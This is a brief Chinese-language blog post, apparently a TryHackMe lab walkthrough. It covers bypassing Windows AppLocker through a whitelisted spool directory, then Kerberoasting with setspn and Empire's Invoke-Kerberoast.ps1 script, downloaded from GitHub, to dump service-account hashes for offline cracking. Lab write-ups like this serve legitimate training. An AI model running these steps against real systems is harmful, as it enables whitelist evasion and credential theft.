windows7-applocker-thm


有很多方法可以绕过AppLocker

1.如果AppLocker配置了默认的 AppLocker 规则,我们可以通过将可执行文件放置在以下目录中来绕过它:  C:\Windows\System32\spool\drivers\color – 默认情况下该目录已列入白名单

2.Kerberoasting 是一种从 Active Directory 中提取服务帐户哈希值以便稍后用于离线破解的攻击。

使用以下命令查找具有服务主体名称属性设置的用户:

setspn -T medin -Q ​ /

上图可以看出已经识别出了用户为fela

3.下载下面的脚本,用于转储hash https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1

在color目录运行 . .\Invoke-Kerberoast.ps1,再运行Invoke-Kerberoast -OutputFormat hashcat ​ |fl 如下图:

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注